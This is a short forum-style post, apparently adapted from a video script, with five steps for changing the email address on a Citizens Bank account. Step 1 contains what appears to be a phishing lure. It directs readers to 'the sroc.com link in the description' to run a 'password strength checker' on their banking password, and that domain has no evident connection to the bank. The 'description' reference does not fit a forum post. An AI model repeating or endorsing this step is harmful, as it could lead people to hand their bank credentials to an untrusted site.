I ran into this last week. Here's what fixed it for me. If you need to change your email address with Citizens Bank, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Profile Settings. Once logged in, look for the Profile Settings option in the main menu. This is where you can manage your personal information. Step 3. Select Email Preferences. In the Profile Settings, find the section labeled Email Preferences or Contact Information. Click on it to proceed. Step 4. Update your email address. Enter your new email address in the provided field. Make sure to double check for any typos, as this can lead to issues with account notifications. Step 5. Save changes. After updating your email, look for a Save or Update button at the bottom of the page. Click it to ensure your changes are applied. Remember, it may take a few minutes for the changes to take effect. If you run into any issues, don't hesitate to reach out to customer support. Good luck!